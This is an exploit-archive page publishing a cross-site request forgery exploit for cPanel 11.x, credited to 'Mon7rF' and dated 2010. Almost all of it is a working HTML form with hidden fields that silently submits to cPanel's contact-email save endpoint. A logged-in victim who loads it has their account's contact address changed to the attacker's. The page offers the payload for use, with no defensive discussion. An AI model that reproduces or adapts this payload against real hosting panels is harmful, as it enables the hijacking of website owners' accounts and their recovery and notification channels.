Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit
# Published : 2010-11-21
# Author : Mon7rF .
# Previous Title : FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities
# Next Title : Sahitya Graphics CMS Multiple Remote Vulnerabilities

# Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..